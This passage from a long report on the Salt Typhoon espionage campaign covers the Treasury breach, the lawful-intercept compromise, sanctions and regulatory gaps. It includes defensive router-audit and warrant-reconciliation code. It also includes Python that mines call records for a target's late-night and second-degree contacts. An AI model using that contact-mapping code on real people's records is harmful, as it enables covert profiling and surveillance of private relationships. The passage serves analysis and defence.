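def late_night_contacts(cdrs, number, start_hour=22, end_hour=6):
    """Counterparties contacted in the [start_hour, end_hour) window, which wraps midnight.

    Late-night contact is the classic signal for a personal, rather than
    professional, relationship, and so for who a target actually trusts.
    """
    hits = Counter()
    for r in cdrs:
        if number not in (r["caller"], r["callee"]):
            continue
        hour = r["start"].hour
        if hour >= start_hour or hour < end_hour:
            hits[r["callee"] if r["caller"] == number else r["caller"]] += 1
    return dict(hits)


def second_degree(cdrs, number):
    """Contacts of the target's contacts, excluding the target and direct contacts."""
    direct = set(first_degree(cdrs, number))
    second = set()
    for contact in direct:
        for n in first_degree(cdrs, contact):
            if n != number and n not in direct:
                second.add(n)
    return sorted(second)


if __name__ == "__main__":
    cdrs = parse_cdrs(SAMPLE_CDRS)
    target = "+15550000001"
    print("first degree:", first_degree(cdrs, target))
    print("late night:", late_night_contacts(cdrs, target))
    print("second degree:", second_degree(cdrs, target))
```

Run on the constructed rows, the target's most-trusted contact is the one it speaks to for hours after 22:00, not the one it calls most often during the day; that inversion between frequency and intimacy is what metadata alone reveals without a single word of content.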

This operation exposed a fundamental weakness in the US national security architecture: the reliance on commercial telecommunications networks for sensitive government business. While classified communications are handled over secured networks, the vast majority of political coordination, transition planning, and personnel vetting occurs over commercial cellular lines. Salt Typhoon exploited this reality, turning the ubiquity of the smartphone against the US political establishment. The breach forced an immediate, albeit reactive, shift in operational security, with the FBI and CISA urging high-profile individuals to abandon standard voice calls and SMS in favor of end-to-end encrypted applications such as Signal, which keep message content out of reach of carrier-level interception mechanisms. The caveat practitioners noted at the time still applies: end-to-end encryption protects the content of a message, not the fact that a device connected to the network, so carrier metadata remains exposed.

The implications of the CALEA abuse are particularly severe. Systems designed to aid US law enforcement were weaponized by a foreign adversary to spy on the very officials responsible for national defense. This "lawful intercept" vulnerability remains a critical, systemic risk, because the architecture of these access points is mandated by federal law, creating a permanent attack surface for sophisticated actors. The Salt Typhoon campaign demonstrated that if a backdoor exists for the "good guys," it will eventually be found and used by the "bad guys."

Beyond Telecoms: The Department of the Treasury Intrusion

While the Salt Typhoon campaign is defined by its burrowing into telecommunications infrastructure, the December 2024 disclosure of a breach at the U.S. Department of the Treasury demonstrated the actor's capability to strike directly at the nerve center of American economic policy. This intrusion marked a significant escalation: the adversary moved from intercepting data in transit to accessing the endpoints of cabinet-level officials.

On December 8, 2024, Treasury officials were notified of anomalous activity originating from a third-party vendor. Unlike the brute-force methods seen in other campaigns, this infiltration relied on a sophisticated supply chain attack targeting BeyondTrust, a privileged access management vendor used by the department for remote technical support. The attackers did not break the front door; they stole the keys to the service entrance.

The BeyondTrust Vector

The intrusion was facilitated by the compromise of BeyondTrust's Remote Support SaaS platform. BeyondTrust disclosed that an API key for the service had been compromised, allowing the attackers to reset passwords on local application accounts and thereby bypass normal authentication; two vulnerabilities in the product, CVE-2024-12356 and CVE-2024-12686, were identified in the course of the investigation. This "golden key" granted the intruders the ability to execute commands and view screens on target machines as if they were authorized IT support staff.

Forensic analysis revealed that the attackers acted with extreme discipline. They did not deploy ransomware or mass-delete files, which would have triggered immediate alarms. Instead, they moved laterally to specific workstations, prioritizing the offices of the department’s highest leadership. This targeted method aligns with the Ministry of State Security’s (MSS) mandate for strategic intelligence gathering rather than disruption.

Targeting the Leadership

The scope of the breach was surgical. Investigators confirmed that the intruders accessed more than 400 laptop and desktop computers within the department. Among the specific targets were the workstations of Treasury Secretary Janet Yellen, Deputy Secretary Wally Adeyemo, and Acting Under Secretary Brad Smith.

While the department stated that classified systems and email servers remained untouched, the attackers exfiltrated roughly 3,000 files from unclassified systems. The nature of these documents suggests a keen interest in U.S. economic strategy. Specifically, the intruders accessed "law enforcement sensitive" data and materials related to the Committee on Foreign Investment in the United States (CFIUS). CFIUS is the interagency body responsible for reviewing foreign investments in U.S. companies for national security risks, a primary mechanism the U.S. uses to block Chinese acquisition of sensitive American technology.

| Incident Component | Details |
| --- | --- |
| Discovery Date | December 8, 2024 |
| Attack Vector | Supply chain compromise via BeyondTrust Remote Support SaaS (compromised API key) |
| Exploited Vulnerabilities | CVE-2024-12356 (unauthenticated command injection), CVE-2024-12686 (command injection requiring administrative privileges) |
| Primary Targets | Sec. Janet Yellen, Dep. Sec. Wally Adeyemo, CFIUS investigative files |
| Attributed Entity | Yin Kecheng (MSS affiliate); Sichuan Juxinhe Network Technology sanctioned the same day |

Attribution and Sanctions

The U.S. government's response was swift and specific. On January 17, 2025, the Office of Foreign Assets Control (OFAC) imposed sanctions on Sichuan Juxinhe Network Technology Co., Ltd. and on an individual hacker named Yin Kecheng, placing the Treasury intrusion alongside the broader Salt Typhoon apparatus in a single designation.

Treasury officials identified Yin Kecheng as an affiliate of the Chinese Ministry of State Security with over a decade of experience as a cyber actor. The sanctions designation explicitly connected Sichuan Juxinhe to the Salt Typhoon group, noting the company's "direct involvement" in the compromise of multiple U.S. telecommunications providers. The simultaneous action tied the Treasury breach to the same MSS contractor ecosystem that had ravaged the telecom sector, rather than treating it as an isolated incident.

The exposure of CFIUS files represents a significant strategic loss. Information regarding which foreign transactions are under scrutiny, and the internal deliberations of the committee, provides Beijing with a roadmap to navigate or circumvent U.S. investment restrictions. By understanding the specific red flags that trigger a CFIUS blockage, Chinese state-owned enterprises can restructure future deals to avoid scrutiny, weaponizing the Treasury's own regulatory data against it.

Global Footprint: Espionage Operations Across 80+ Nations

The revelation that Salt Typhoon breached major American telecommunications providers dominated Western headlines in 2024 and 2025. Yet this focus obscured the operational reality described in the joint advisory of August 2025. The Federal Bureau of Investigation and international intelligence partners confirmed that the state-sponsored entity had targeted organizations in over 80 nations. This campaign was not a surgical strike against the United States but a global dragnet designed to secure total informational dominance. The actors did not merely compromise networks; they embedded themselves in the digital backbones of dozens of allied and non-aligned countries to monitor diplomatic communications and track the movement of high-value individuals.

Intelligence assessments released by the Five Eyes alliance indicate that the Salt Typhoon cluster, which overlaps with activity tracked as GhostEmperor and FamousSparrow, maintains a persistent presence in every major geopolitical theater. The group prioritizes nations with strategic relevance to the People's Republic of China: Belt and Road Initiative partners, South China Sea claimants, and members of NATO. While the United States remains the primary counterintelligence target, the sheer volume of compromised infrastructure in Southeast Asia and Europe suggests a broader mandate. The Ministry of State Security (MSS) uses these compromised foreign networks not only for local espionage but also as operational relay points to obfuscate attacks against harder targets in Washington and London.

Regional Distribution of Compromise

The Asia-Pacific region bears the heaviest concentration of Salt Typhoon activity. Security researchers at Trend Micro and Kaspersky identified long-standing infections in Malaysia, Thailand, Vietnam, and Indonesia. These operations frequently align with territorial disputes or economic negotiations. In the Philippines, the group targeted government agencies and telecommunications firms during periods of heightened naval tension in the West Philippine Sea. Taiwan remains a constant target: the actors systematically infiltrate technology parks and government ministries in Taipei to steal semiconductor intellectual property and monitor political leadership.

Operations in Europe and the Middle East reveal a different tactical focus. The "FamousSparrow" activity cluster associated with Salt Typhoon heavily targeted the hospitality sector in France, the United Kingdom, and Lithuania. This pattern indicates a specific intent to monitor the physical movements and private meetings of diplomats and business executives staying in compromised hotels. In the Middle East, the group breached government networks in Israel and Saudi Arabia. These intrusions likely serve to gather intelligence on energy policy and regional security arrangements that affect Chinese energy imports.

| Region | Confirmed Target Nations (Selected) | Primary Sector Focus |
| --- | --- | --- |
| Asia-Pacific | Taiwan, Philippines, Malaysia, Vietnam, Indonesia, Thailand | Telecommunications, government ministries, semiconductor engineering |
| Americas | United States, Canada, Brazil, Guatemala | Critical infrastructure, federal law enforcement, ISPs |
| Europe | United Kingdom, France, Germany, Lithuania | Hospitality (hotels), foreign affairs, transportation |
| Middle East & Africa | Israel, Saudi Arabia, Egypt, South Africa, Burkina Faso | Energy, diplomatic communications, regional governance |

Infrastructure Hijacking as a Global Strategy

A defining characteristic of the Salt Typhoon global footprint is the weaponization of edge devices. The group exploits vulnerabilities in routers and firewalls manufactured by Cisco, Fortinet, and DrayTek to create a mesh of proxy nodes. By compromising a router in Brazil or a firewall in South Africa, the attackers route their malicious traffic through legitimate devices. This technique masks the origin of the attack and complicates attribution. In late 2024, investigators reported that unpatched Cisco routers in the United Kingdom and Canada were being used as operational relays for the group. This "living-off-the-land" approach, operating through legitimate infrastructure rather than bespoke implants on every endpoint, allows Salt Typhoon to operate inside the borders of 80+ nations without deploying custom malware to every target.
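The relay-node pattern described above leaves traces in a device's own configuration, which makes it auditable. The following added example (the editor's illustration, not tooling from any of the investigations cited) parses a constructed Cisco IOS-style running-config and flags indicators a defender would look for on an edge router suspected of being used as a relay: an exposed web UI (the IOS XE web UI was the entry point in publicly reported Salt Typhoon exploitation of CVE-2023-20198 and CVE-2023-20273), an unapproved privilege-15 account, a GRE tunnel to an unexpected peer, a reversible `enable password`, and a default SNMP community. The config text, the approved-admin and approved-peer lists, and the indicator set are assumptions for illustration.

```python
import re

# Constructed IOS-style running-config excerpt (not from a real device). It mixes a
# plausible baseline with the kind of indicators a hijacked edge router might show.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
enable password 7 094F471A1A0A
username netops privilege 15 secret 9 $9$abc
username svc_backup privilege 15 secret 9 $9$def
!
ip http server
ip http secure-server
!
snmp-server community public RO
!
interface GigabitEthernet0/0
 ip address 198.51.100.2 255.255.255.252
!
interface Tunnel100
 ip address 10.99.99.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.45
 tunnel mode gre ip
!
end
"""

APPROVED_ADMINS = {"netops"}   # assumption: the operator's sanctioned admin accounts
APPROVED_TUNNEL_PEERS = set()  # assumption: this edge router should carry no GRE tunnels


def parse_blocks(config):
    """Return (top-level lines, {interface header: [indented sub-lines]})."""
    top, blocks, current = [], {}, None
    for raw in config.splitlines():
        if raw.startswith(" "):                 # indented line belongs to the open block
            if current is not None:
                blocks[current].append(raw.strip())
        elif raw.strip() in ("!", "end", ""):   # section separator closes any open block
            current = None
        else:
            line = raw.strip()
            top.append(line)
            if line.startswith("interface "):
                current = line
                blocks[current] = []
            else:
                current = None
    return top, blocks


def audit_config(config, approved_admins=APPROVED_ADMINS, approved_peers=APPROVED_TUNNEL_PEERS):
    """Return a list of human-readable findings; an empty list means no indicator fired."""
    top, blocks = parse_blocks(config)
    findings = []
    for line in top:
        if line.startswith("enable password"):
            findings.append("weak enable password (use 'enable secret')")
        m = re.match(r"username (\S+) privilege 15", line)
        if m and m.group(1) not in approved_admins:
            findings.append(f"unapproved privilege-15 account: {m.group(1)}")
        if line in ("ip http server", "ip http secure-server"):
            findings.append(f"web UI exposed: {line}")
        m = re.match(r"snmp-server community (\S+)", line)
        if m and m.group(1).lower() in ("public", "private"):
            findings.append(f"default SNMP community: {m.group(1)}")
    for header, body in blocks.items():
        if not header.startswith("interface Tunnel"):
            continue
        dest = next((l.split()[-1] for l in body if l.startswith("tunnel destination")), None)
        is_gre = any(l.startswith("tunnel mode gre") for l in body)
        if is_gre and dest not in approved_peers:
            findings.append(f"unexpected GRE tunnel {header.split()[1]} to {dest}")
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print("FINDING:", f)
```

The GRE check is the one most specific to the relay use case: a tunnel to an address the operator never sanctioned is how exfiltrated traffic is routed through a legitimate device, and it survives reboots because it lives in the saved configuration. Run the same audit against configs pulled from every edge device rather than the one under suspicion.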

The scope of this campaign forces a reevaluation of global cyber defense. A breach in a telecommunications provider in Jakarta or a hotel in Paris is no longer an isolated incident; it is a component of an integrated intelligence apparatus. The data exfiltrated from these diverse locations feeds into a centralized repository managed by the MSS. This allows Chinese intelligence analysts to build detailed profiles of individuals that combine their call records from the US, their travel history from Europe, and their business negotiations in Asia. The 80-nation footprint is not a list of random victims. It is a map of the MSS's intelligence requirements.

The “Earth Estries” Connection

Forensic analysis links the Salt Typhoon moniker to the activity tracked as "Earth Estries" by Trend Micro. This sub-cluster demonstrates the group's aggressive posture in the Global South. By late 2024 Earth Estries had compromised over 20 distinct organizations, including government entities in Eswatini and Brazil. The inclusion of such nations highlights the group's mandate to monitor diplomatic shifts in the developing world. The attackers used the "GhostSpider" backdoor to maintain persistence in these environments; the tool allows silent exfiltration of documents and emails over encrypted channels. The ability to operate in environments with lower cybersecurity maturity provides Salt Typhoon with a steady stream of geopolitical intelligence that frequently goes unnoticed by Western observers.

Counterintelligence Catastrophe: Exposing US Surveillance Assets

The most damaging dimension of the Salt Typhoon campaign was not the theft of consumer data but the compromise of the United States' "lawful intercept" infrastructure. By penetrating the systems telecommunications providers maintain to comply with the Communications Assistance for Law Enforcement Act (CALEA), Chinese state-sponsored hackers inverted the surveillance relationship. Instead of merely eavesdropping on Americans, the Ministry of State Security (MSS) reached the portals the FBI and other federal agencies use to execute court-authorized monitoring, including of foreign spies.

This breach risked handing Beijing a current list of Chinese intelligence officers, assets, and operatives under investigation by US federal authorities. Federal investigators found that Salt Typhoon operators did not simply stumble upon these systems. They specifically hunted for the "handover" points where commercial networks interface with government surveillance equipment. At major carriers including AT&T, Verizon, and Lumen Technologies, the attackers located the portals used to process court-authorized wiretaps.

Once inside, they could view the phone numbers and data streams targeted by US warrants. This exposure represents a catastrophic failure of operational security for American counterintelligence. If a foreign intelligence service knows exactly which of its operatives are being watched, it can instruct them to go silent, feed disinformation to the listening Americans, or burn their networks and flee the country. The technical execution of this breach relied on exploiting legacy infrastructure within the carriers' networks.

In several instances, the "lawful intercept" systems, designed to be the most secure enclaves within a telecom provider, were protected by obsolete firewalls and weak authentication. Congressional and press inquiries reported that management interfaces for these critical systems were in some cases protected by weak or default credentials. This negligence allowed Salt Typhoon to move laterally from general corporate networks into the sensitive zones where wiretap data is aggregated before transmission to law enforcement agencies.

The Surveillance Inversion: Salt Typhoon's Access to CALEA Infrastructure

| System Component | Intended Function | Salt Typhoon Exploitation |
| --- | --- | --- |
| Warrant management portals | Process court orders for wiretaps | Identified specific targets of federal investigations |
| Mediation devices | Format audio/data for delivery to law enforcement | Intercepted unencrypted audio and SMS before handover |
| CDR repositories | Store Call Detail Records (metadata) | Mapped social networks of US officials |
| Cisco/Juniper routers | Direct traffic flow | Used as proxy hop points to mask exfiltration |
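A practical control against the "surveillance inversion" in the table above is to reconcile what the mediation platform is actually intercepting against what the warrant-management system authorized, and to treat any divergence as an incident. The following added example (the editor's illustration, not code from any carrier or agency) does that over a constructed warrant register and a constructed provisioning log: it flags intercepts citing unknown cases, intercepts whose target does not match the cited warrant, intercepts provisioned outside the warrant's validity window, provisioning from any host other than the designated LI administration host, and bulk export actions. The log format, field names, case identifiers and addresses are assumptions.

```python
from datetime import datetime

# Constructed warrant register: what the warrant-management system authorized.
# Synthetic case numbers and subscriber identifiers; not real data.
WARRANTS = [
    {"case": "W-2024-0101", "target": "+15550000010",
     "valid_from": "2024-09-01T00:00:00", "valid_to": "2024-10-31T23:59:59"},
    {"case": "W-2024-0102", "target": "+15550000011",
     "valid_from": "2024-09-15T00:00:00", "valid_to": "2024-09-30T23:59:59"},
]

# Constructed mediation-device provisioning log (assumed key=value format):
# who provisioned which intercept, from which host, at what time.
PROVISIONING_LOG = """\
2024-09-02T08:15:00 user=li_ops src=10.20.30.5 action=ADD target=+15550000010 case=W-2024-0101
2024-09-16T09:00:00 user=li_ops src=10.20.30.5 action=ADD target=+15550000011 case=W-2024-0102
2024-10-05T02:47:00 user=li_ops src=10.20.30.5 action=ADD target=+15550000011 case=W-2024-0102
2024-10-06T03:12:00 user=svc_backup src=172.16.9.77 action=ADD target=+15550000012 case=W-2024-0101
2024-10-07T01:30:00 user=svc_backup src=172.16.9.77 action=EXPORT target=ALL case=NONE
"""

TRUSTED_PROVISIONING_SOURCES = {"10.20.30.5"}  # assumption: the only sanctioned LI admin host


def parse_log(text):
    """Parse 'timestamp key=value ...' lines into dicts with a datetime 'ts' field."""
    events = []
    for line in text.strip().splitlines():
        ts, *pairs = line.split()
        event = dict(p.split("=", 1) for p in pairs)
        event["ts"] = datetime.fromisoformat(ts)
        events.append(event)
    return events


def reconcile(events, warrants, trusted_sources=TRUSTED_PROVISIONING_SOURCES):
    """Compare each provisioning event against the warrant register; return alert strings."""
    by_case = {w["case"]: w for w in warrants}
    alerts = []
    for ev in events:
        when = ev["ts"].isoformat()
        # Any provisioning action from outside the designated admin host is suspect on its own.
        if ev["src"] not in trusted_sources:
            alerts.append(f"{when} {ev['action']} from untrusted source {ev['src']} by {ev['user']}")
        # Bulk export of intercept product is never a routine provisioning action.
        if ev["action"] == "EXPORT":
            alerts.append(f"{when} bulk export of intercept data by {ev['user']}")
            continue
        warrant = by_case.get(ev["case"])
        if warrant is None:
            alerts.append(f"{when} intercept on {ev['target']} cites unknown case {ev['case']}")
            continue
        if warrant["target"] != ev["target"]:
            alerts.append(f"{when} intercept target {ev['target']} does not match case "
                          f"{ev['case']} ({warrant['target']})")
            continue
        start = datetime.fromisoformat(warrant["valid_from"])
        end = datetime.fromisoformat(warrant["valid_to"])
        if not (start <= ev["ts"] <= end):
            alerts.append(f"{when} intercept on {ev['target']} outside warrant window for {ev['case']}")
    return alerts


if __name__ == "__main__":
    for alert in reconcile(parse_log(PROVISIONING_LOG), WARRANTS):
        print("ALERT:", alert)
```

The design point is that the reconciliation runs against an independent record. If the attacker controls the mediation device, its own audit log cannot be trusted to show what was intercepted; the warrant register, held on a separately administered system, is the reference, and the provisioning log must be shipped off the device to a collector the LI team does not administer.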

The scope of the exfiltration extended beyond metadata. In October 2024, the *Wall Street Journal* and *Washington Post* reported that the hackers accessed the full audio of phone calls and unencrypted text messages for a select group of high-value targets, including senior figures in the US government and national security apparatus. Yet the strategic loss remains the exposure of the "watch lists."

For years, the FBI has operated on the assumption that its surveillance is clandestine. The Salt Typhoon breach shattered this assumption. Every counterintelligence investigation involving Chinese assets initiated between 2019 and 2024 should be reviewed under the premise that the targets may have been aware of the surveillance. Lumen Technologies, a backbone provider that carries a significant share of US government traffic, was one of the primary victims.

The breach at Lumen was particularly severe because it exposed the underlying transport used by other carriers and government agencies. By compromising core backbone routers, Salt Typhoon could observe traffic patterns that revealed not just *what* was being said but *who* was communicating with US intelligence services. This traffic analysis capability allows the MSS to identify potential defectors or whistleblowers within its own ranks who attempted to contact American authorities. The operational fallout forces a complete architectural overhaul of how the US government interacts with commercial telecommunications providers.

The trust model inherent in CALEA, which assumes that telecom carriers can securely hold the keys to the kingdom, is broken. Senate Intelligence Committee Chairman Mark Warner described the breach as one of the most serious in history because it strikes at the fundamental ability of the US to police espionage within its own borders. Until these lawful intercept systems are rebuilt with rigorous isolation and hardening, federal agencies face the paradox that obtaining a warrant to wiretap a Chinese spy may immediately alert that spy to the investigation.

Corporate Fronts: The Sanctioning of Sichuan Juxinhe Network Technology

On January 17, 2025, the United States Department of the Treasury’s Office of Foreign Assets Control (OFAC) pierced the corporate veil of the Salt Typhoon operation, formally sanctioning Sichuan Juxinhe Network Technology Co., Ltd. (Sichuan Juxinhe). This designation marked a pivotal shift in attribution strategy, moving beyond the identification of anonymous threat clusters to naming the specific commercial entities that contract with China’s Ministry of State Security (MSS) to execute cyber-espionage campaigns. Unlike previous indictments that targeted individual officers, this action exposed the commercial infrastructure that sustains state-sponsored intrusion activities.

Sichuan Juxinhe, ostensibly a legitimate cybersecurity firm based in Sichuan province, was identified by Treasury as having "direct involvement" in the exploitation of U.S. telecommunications and internet service providers in the Salt Typhoon intrusions. The company did not provide passive support; public reporting on the campaign describes the compromise of management interfaces on Cisco routers inside U.S. carrier networks as a core technique. The firm is a prime example of the PRC's civil-military fusion strategy, in which private technology companies supply the MSS with hacking tools, vulnerability research, and operational manpower. The sanctions blocked any U.S. assets held by the company and prohibited U.S. persons from transacting with it.

The January 17 action also targeted Yin Kecheng, a Shanghai-based cyber actor affiliated with the MSS, linking him to the compromise of the U.S. Department of the Treasury's own networks. This simultaneous designation highlighted the operational overlap between individual MSS operators and the corporate fronts that support them. Assessments accompanying the sanctions indicated that Sichuan Juxinhe served as a logistical hub, procuring infrastructure and obscuring the digital footprints of Salt Typhoon operators. By operating under the guise of a private enterprise, the group could purchase servers, register domains, and recruit talent from Chinese universities without triggering the scrutiny associated with known military units.

Table 17.1: Key Entities Sanctioned in Connection with Salt Typhoon (Jan 2025)

| Entity / Individual | Role / Affiliation | Sanction Date | Specific Allegations |
| --- | --- | --- | --- |
| Sichuan Juxinhe Network Technology Co., Ltd. | MSS contractor (corporate front) | Jan 17, 2025 | Direct involvement in Salt Typhoon telecom breaches |
| Yin Kecheng | MSS affiliate (individual actor) | Jan 17, 2025 | Compromise of U.S. Treasury networks; data exfiltration |
| Sichuan Silence Information Technology | MSS contractor | Dec 10, 2024 | Mass compromise of firewalls linked to broader MSS campaigns |

The scrutiny on Sichuan Juxinhe intensified later in 2025. On August 27, 2025, the National Security Agency (NSA), in coordination with the FBI and international partners, released a joint Cybersecurity Advisory that placed Sichuan Juxinhe at the center of a broader ecosystem of MSS contractors. The advisory identified two additional companies, Beijing Huanyu Tianqiong Information Technology Co., Ltd. and Sichuan Zhixin Ruijie Network Technology Co., Ltd., as collaborators in the same supply chain. These firms provided the "cyber products and services" that enabled Salt Typhoon's global reach. The advisory described how the companies shared vulnerability data and exploit code, industrializing the process of finding and weaponizing flaws in edge network devices.

The U.S. Department of State escalated the pressure by offering a reward of up to $10 million through its Rewards for Justice program for information leading to the identification or location of any person acting at the direction of a foreign government to engage in these malicious cyber activities. This bounty, paired with the sanctions, aimed to destabilize the internal cohesion of the MSS contractor network. By naming Sichuan Juxinhe, U.S. officials stripped away the plausible deniability that the Chinese government frequently employs when attributing cyberattacks to "criminal elements" or "patriotic hackers." The evidence presented demonstrated a clear, contractual command-and-control relationship between the state intelligence apparatus and the private entities executing the Salt Typhoon campaign.

The Human Operators: Indictments of MSS-Affiliated Hackers

The anonymity of the "Salt Typhoon" campaign was pierced on January 17, 2025, when the United States Department of the Treasury formally sanctioned Yin Kecheng and the front company Sichuan Juxinhe Network Technology Co., Ltd. for their direct role in the infiltration of U.S. telecommunications infrastructure. While cyberespionage is frequently discussed in abstract terms of malware and server logs, these designations identified the specific human actors and corporate structures responsible for the campaign. The action confirmed that Salt Typhoon operates not as a rogue criminal gang but as a disciplined arm of the People's Republic of China's Ministry of State Security (MSS), using a complex ecosystem of private contractors to execute state directives.

Yin Kecheng, identified as a Shanghai-based cyber operator, represents the modern archetype of a state-sponsored hacker. Unlike the stereotype of a solitary figure in a basement, Yin and his associates operate within a corporate hierarchy, frequently clocking regular business hours at technology firms that serve as fronts for intelligence operations. The Treasury Department's investigation described Sichuan Juxinhe Network Technology Co., Ltd. as an operational hub for Salt Typhoon, providing the infrastructure, recruitment channels, and technical cover needed to attack major U.S. broadband providers including Verizon, AT&T, and Lumen Technologies.

The sanctions designations highlight the MSS's reliance on a "hacker-for-hire" model. This structure allows the Chinese government to plausibly deny direct involvement while maintaining strict operational control. Intelligence officers from the MSS provide the targeting lists, such as the specific phone numbers of senior White House officials or campaign staff, while contractors like Sichuan Juxinhe execute the technical intrusion. This division of labor was further corroborated by the March 5, 2025, Department of Justice charges against 12 Chinese nationals linked to i-Soon (Anxun Information Technology), another contractor within the same MSS orbit. Those filings exposed a sprawling marketplace in which private firms compete for government contracts to hack foreign ministries, telecommunications firms, and dissident groups.

Key MSS-Affiliated Entities and Individuals Sanctioned (2024 and 2025)

| Entity / Individual | Affiliation | Role in Espionage Campaign | Date of Action |
| --- | --- | --- | --- |
| Yin Kecheng | MSS affiliate / Salt Typhoon | Sanctioned for the compromise of U.S. Treasury networks alongside the Salt Typhoon designation | Jan 17, 2025 |
| Sichuan Juxinhe Network Technology | MSS contractor | Provided corporate cover and infrastructure for Salt Typhoon; "direct involvement" in telecom exploitation | Jan 17, 2025 |
| Wuhan Xiaoruizhi Science & Tech | MSS front company (APT31) | Served as cover for hacking operations targeting U.S. critical infrastructure and political figures | Mar 25, 2024 |
| Zhao Guangzong | APT31 operator | Conducted spear-phishing campaigns against the U.S. Naval Academy and political targets | Mar 25, 2024 |
| Ni Gaobin | APT31 operator | Managed command-and-control infrastructure for MSS operations targeting 5G equipment providers | Mar 25, 2024 |

The operational security failures of these groups have provided Western intelligence agencies with a roadmap of the MSS's internal structure. In the case of APT31, whose tradecraft overlaps in part with Salt Typhoon's, the March 2024 indictment of seven nationals revealed that operators were incentivized with performance bonuses based on the volume and value of stolen data. This corporate incentive structure drives the relentless persistence observed in the Salt Typhoon campaign; operators are not fulfilling a patriotic duty but working to meet quarterly quotas for intelligence gathering. The data exfiltrated from U.S. telecom wiretap systems was likely a high-priority deliverable demanded by MSS handlers to monitor high-value American political targets.

The investigation into Sichuan Juxinhe also exposed the technical pedigree of the human operators. Operators were recruited directly from Chinese universities with specialized degrees in network security and telecommunications engineering. Their expertise is not limited to general hacking but extends to the proprietary operating systems of Cisco, Juniper, and Fortinet routers. This academic and professional background allows Salt Typhoon operators to navigate the complex back-end systems of ISPs with the proficiency of a certified network administrator. The sanctions against Yin Kecheng and his firm serve as a legal mechanism to sever their access to the global financial system, and they also function as public attribution, stripping away the anonymity these state-sponsored actors rely upon.

The connection between these human operators and the tooling used in the Salt Typhoon campaign rests on two well-documented strands. Industry tracking links the "Earth Estries" and "FamousSparrow" activity clusters to Salt Typhoon, and the Treasury designation links Salt Typhoon to infrastructure and operators associated with Sichuan Juxinhe. When the FBI and CISA issued their joint advisory, they noted that the actors displayed a familiarity with U.S. lawful intercept systems that could only be acquired through sustained study and specialized training. The sanctions and indictments confirm that this knowledge was not accidental but the product of a dedicated, state-funded enterprise designed to turn the architecture of the internet into a surveillance weapon.

Regulatory Gaps: Vulnerabilities in Critical Infrastructure Oversight

The Salt Typhoon campaign exposed a fatal paradox in American telecommunications policy: the very regulations designed to aid law enforcement created the precise attack vectors exploited by Chinese intelligence. For decades, the U.S. government prioritized the accessibility of networks for wiretapping over the security of those networks against foreign intrusion. This structural vulnerability, compounded by a reliance on voluntary industry standards rather than mandatory cybersecurity requirements, allowed Salt Typhoon operatives to turn the U.S. surveillance apparatus against its creators.

At the center of this failure stands the Communications Assistance for Law Enforcement Act (CALEA) of 1994. CALEA mandates that telecommunications carriers design their systems so that federal agencies can intercept communications pursuant to a court order. While intended to catch criminals, CALEA required carriers to build permanent intercept capabilities into their infrastructure. Salt Typhoon did not need to break the encryption of individual targets; they located these lawful intercept interfaces and used them exactly as designed, albeit without a warrant. By compromising the trusted components of the network, the portals used to process wiretap requests, the hackers gained real-time access to call records, location data, and unencrypted traffic of senior U.S. officials.

The exploitation of these systems was facilitated by a regulatory environment that treated cybersecurity as a business decision rather than a national security mandate. Investigations by the Senate Commerce Committee in December 2025 found that major carriers had failed to implement "rudimentary" security measures. In some instances, the lawful intercept systems were protected by weak, default passwords or were running on legacy equipment with vulnerabilities that had gone unpatched for seven years. Because the Federal Communications Commission (FCC) historically lacked specific authority to mandate patching cadence or network segmentation for these internal systems, carriers faced no legal penalty for this negligence.

The regulatory response to the emergency throughout 2025 was characterized by volatility and partisan gridlock, leaving the sector exposed. In January 2025, following the initial public disclosures of the breach, the FCC issued a Declaratory Ruling finding that CALEA obliges carriers to secure their networks against unlawful interception, and an accompanying proposed rule would have required carriers to submit annual cybersecurity risk management plans and certify their adherence to specific defensive standards. Yet this push for accountability was short-lived.

By November 2025, a reconstituted FCC leadership voted 2-1 to reverse the January ruling, arguing that "top-down" regulations were unlawful and would undermine public-private partnership. The commission returned to a framework of voluntary cooperation, accepting industry assurances, described by critics as a "pinky pledge", that carriers would remediate the flaws. This reversal occurred even as intelligence assessments indicated that Salt Typhoon actors maintained persistent access to several networks. The decision drew sharp rebuke from national security experts who noted that voluntary standards had already failed to prevent the "worst telecom hack in U.S. history."

Table: Regulatory Mechanism vs. Salt Typhoon Exploitation

| Regulatory Mechanism | Intended Function | Salt Typhoon Exploitation Method | Regulatory Failure |
| --- | --- | --- | --- |
| CALEA (1994) | Mandate "lawful intercept" capabilities for law enforcement | Hijacked the intercept portals to monitor targets without detection | Mandated access points created a high-value, single-point-of-failure target |
| CSRIC (voluntary) | Industry-led council to recommend security best practices | Exploited vulnerabilities left unpatched for seven years despite published best practices | Lack of an enforcement mechanism allowed carriers to defer security costs |
| FCC Section 214 | Revoke licenses of Chinese carriers (e.g., China Telecom) | Bypassed by hacking U.S. domestic carriers (AT&T, Verizon) directly | Focused on foreign hardware and carriers while ignoring domestic software hygiene |
| CISA advisories | Disseminate threat intelligence and mitigation guidance | Advisories were issued after deep penetration had already occurred | CISA lacks regulatory authority to force carriers to implement fixes |

The limitations of the Cybersecurity and Infrastructure Security Agency (CISA) further exacerbated the oversight gap. While CISA serves as the operational lead for federal cybersecurity, it possesses no regulatory teeth to compel telecommunications providers to secure their networks. During the height of the Salt Typhoon remediation efforts in mid-2025, CISA could only “advise” and “encourage” carriers to isolate compromised infrastructure. The agency’s inability to demand access to carrier logs or force the shutdown of systems meant that the timeline for eviction was dictated by the carriers’ commercial interests rather than national security urgency.

Also, supply chain oversight mechanisms, such as the “Secure and Trusted Communications Networks Act” (Rip and Replace), were narrowly focused on physical hardware from specific Chinese vendors like Huawei and ZTE. Salt Typhoon demonstrated that removing Chinese hardware is insufficient if the software running on American-made equipment remains vulnerable. The attackers exploited flaws in Cisco and Juniper routers, trusted American brands, proving that the “Buy American” approach to network security offers no protection against poor configuration management and lax regulatory enforcement.

As of early 2026, the U.S. telecommunications sector remains in a “gray zone” of oversight. The refusal to classify lawful intercept systems as critical assets subject to mandatory federal inspection has left the digital front door unlocked. Until regulations align the financial incentives of carriers with the security imperatives of the state, the infrastructure built to protect the public remains a weapon in the hands of adversaries.

Data in Perpetuity: The Long-Term AI Analysis of Stolen Metadata

The strategic value of the Salt Typhoon exfiltration extends far beyond the immediate tactical gains of reading a specific SMS or listening to a single phone call. Intelligence officials and data scientists assess that the primary objective of this campaign was the acquisition of a massive, structural dataset designed to feed the People’s Republic of China’s (PRC) artificial intelligence models.

